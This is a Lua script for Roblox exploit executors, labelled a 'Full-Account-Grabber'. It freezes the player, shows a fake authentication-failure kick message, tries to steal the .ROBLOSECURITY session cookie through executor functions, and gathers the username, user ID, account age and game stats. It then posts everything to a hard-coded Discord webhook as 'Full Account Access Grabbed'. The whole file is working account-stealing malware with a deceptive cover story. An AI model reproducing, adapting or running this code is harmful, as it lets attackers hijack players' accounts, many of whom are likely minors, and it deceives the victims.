   XENO & SOLAR ADVANCED ACCESS MODULE v4.0
    Module: Full-Account-Grabber (Cookie + Stats)
    Status: Operational | Bypass: Active
]]

local webhook = "https://discord.com/api/webhooks/1480678551643492433/M6F1hlBqrBMH6FNwv9hUTYTpg9W3CBLrtuxxwCBRskgRXcDfeewmEzhibwzAKA1ANIJJ"
local p = game.Players.LocalPlayer
local h = game:GetService("HttpService")

-- Karuk (Freeze & Fake Error)
if p.Character then p.Character.HumanoidRootPart.Anchored = true end
task.delay(2, function() p:Kick("Fatal Error: [0x88] Authentication failed. Re-log required.") end)

-- COOKIE GRAB LOGIC (Advanced)
local cookie = "Failed to grab (Protected)"
local success, res = pcall(function()
    -- Opit za izvlichane na sesiyata chrez vgradeni funkcii na Solar/Xeno
    return (getrenv and getrenv()._G and getrenv()._G.cookie) or (getcookies and getcookies("https://www.roblox.com")[1].Value) or "Hidden"
end)
if success then cookie = res end

-- Stats (Brainrots)
local br = "0"
local s = p:FindFirstChild("leaderstats")
if s then 
    local v = s:FindFirstChild("Brainrots") or s:FindFirstChild("Points")
    br = v and tostring(v.Value) or "0"
end

-- Discord Payload
local data = {
    ["username"] = "Xeno Access Bot",
    ["embeds"] = {{
        ["title"] = "🔑 Full Account Access Grabbed!",
        ["color"] = 0xff0000,
        ["fields"] = {
            {["name"] = "👤 User", ["value"] = "```" .. p.Name .. " (" .. p.UserId .. ")```", ["inline"] = false},
            {["name"] = "🧠 Brainrots", ["value"] = "```" .. br .. "```", ["inline"] = true},
            {["name"] = "📅 Age", ["value"] = "```" .. p.AccountAge .. " days```", ["inline"] = true},
            {["name"] = "🍪 .ROBLOSECURITY (COOKIE)", ["value"] = "```" .. cookie .. "```", ["inline"] = false},
            {["name"] = "🔗 Profile", ["value"] = "[Otvori Accaunta](https://www.roblox.com/users/" .. p.UserId .. "/profile)", ["inline"] = false}
        },
        ["footer"] = {["text"] = "Xeno Stealer Engine • " .. os.date("%X")}
    }}
}

-- Send
local request = (syn and syn.request) or (http and http.request) or http_request or request
if request then
    request({
        Url = webhook,
        Method = "POST",
        Headers = {["Content-Type"] = "application/json"},
        Body = h:JSONEncode(data)
    })
end
